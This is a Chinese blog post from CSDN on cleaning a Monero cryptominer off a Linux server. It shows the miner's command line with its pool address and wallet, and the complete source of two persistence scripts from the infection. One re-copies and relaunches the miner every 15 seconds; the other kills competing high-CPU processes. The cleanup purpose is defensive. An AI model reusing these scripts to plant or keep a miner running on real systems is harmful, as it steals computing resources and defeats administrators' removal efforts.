1.查看进程
# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'
找出CPU占有率高的你不认识的进程,我的是这样的
bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa
干掉它(11110 是我这台机器上该进程的 PID,请换成你自己查到的 PID;只 kill 进程是不够的,后面会看到有守护脚本会把它重新拉起来)
kill -9 11110
2.全局搜索这个进程用到的矿池地址(注意:grep -r 不带路径时只搜索当前目录,要搜到其他位置需要在 / 下执行或显式指定目录)
[root@wangtianze ~]# grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:cat daemon | grep pool.minexmr.com
.bash_history:cat deamon | grep pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
3.打开搜索到的位置
# vim /boot/grub/deamon
里面是这样的
#!/bin/bash
#daemon
# Persistence watchdog for the miner; the page shows this as the contents of
# /boot/grub/deamon. It is why killing the bashd process alone does not stick:
# the loop below restarts it within roughly 15 seconds.
# Indicators visible here: /boot/grub/grub.tz (stashed copy of the binary),
# /usr/sbin/bashd (running copy), and the pool host/port plus wallet string.
# Widen PATH so that the bare `bashd` command below resolves from /usr/sbin.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
# Loop forever; each pass checks whether the miner is still running.
while true;
do
# Look in the process list for the miner's command line (pool address and
# wallet); `grep -v grep` drops the grep process itself from the match.
server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
# Empty result means the miner is not running.
if [ ! "$server" ]; then
# Re-create the binary from the copy kept under /boot/grub, so deleting only
# /usr/sbin/bashd is undone on the next pass.
cp -rf /boot/grub/grub.tz /usr/sbin/bashd
chmod +x /usr/sbin/bashd
cd /usr/sbin
# Relaunch in the background; nohup keeps it alive after the launching shell exits.
nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
fi
# Re-check interval in seconds.
sleep 15
done
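删掉里面的while循环,只保留下面三行(注意:改文件并不会让已经在运行的 deamon 脚本进程停下来,需要把它也 kill 掉;更彻底的做法是把这个脚本、/boot/grub/grub.tz 和 /usr/sbin/bashd 一并删除,并查清是谁在启动这个脚本,例如 crontab 或开机启动项)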
#!/bin/bash
#daemon
# Neutered version of the watchdog: the restart loop has been removed, so only
# the PATH export is left and the script exits immediately when run.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
全局搜索
# grep -r pool.minexmr.com
同样干掉
#!/bin/bash
#disk_genius
# Companion script to the miner watchdog: it repeatedly kills every process
# that uses a lot of CPU, except the miner itself. On an infected host this
# shows up as legitimate busy services (or competing miners) dying every few
# seconds for no apparent reason.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
# Loop forever, one sweep every 3 seconds.
while true;
do
# Pipeline: list processes -> drop lines containing the miner's pool/wallet
# string (so the miner is spared) -> awk prints the PID (field 2) of rows
# whose %CPU (field 3) exceeds 40.0 -> each PID is sent SIGKILL.
# The `$NF ~//` test uses an empty pattern, which presumably matches every
# row and so does not narrow the selection.
ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}
sleep 3
done
改成
#!/bin/bash
#disk_geniusi
# Neutered version of the CPU-killer script: the kill loop has been removed,
# so only the PATH export is left and the script exits immediately when run.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
再次搜索
# grep -r pool.minexmr.com
终于没了
清理完之后,首先要找到入侵是从哪里的漏洞进来的并修复,然后把相关服务设置为只允许特定IP访问,否则还会被再次植入
---------------------
作者:Wang_Tian_Ze
来源:CSDN
原文:https://blog.csdn.net/qq_16845639/article/details/77650271
版权声明:本文为博主原创文章,转载请附上博文链接!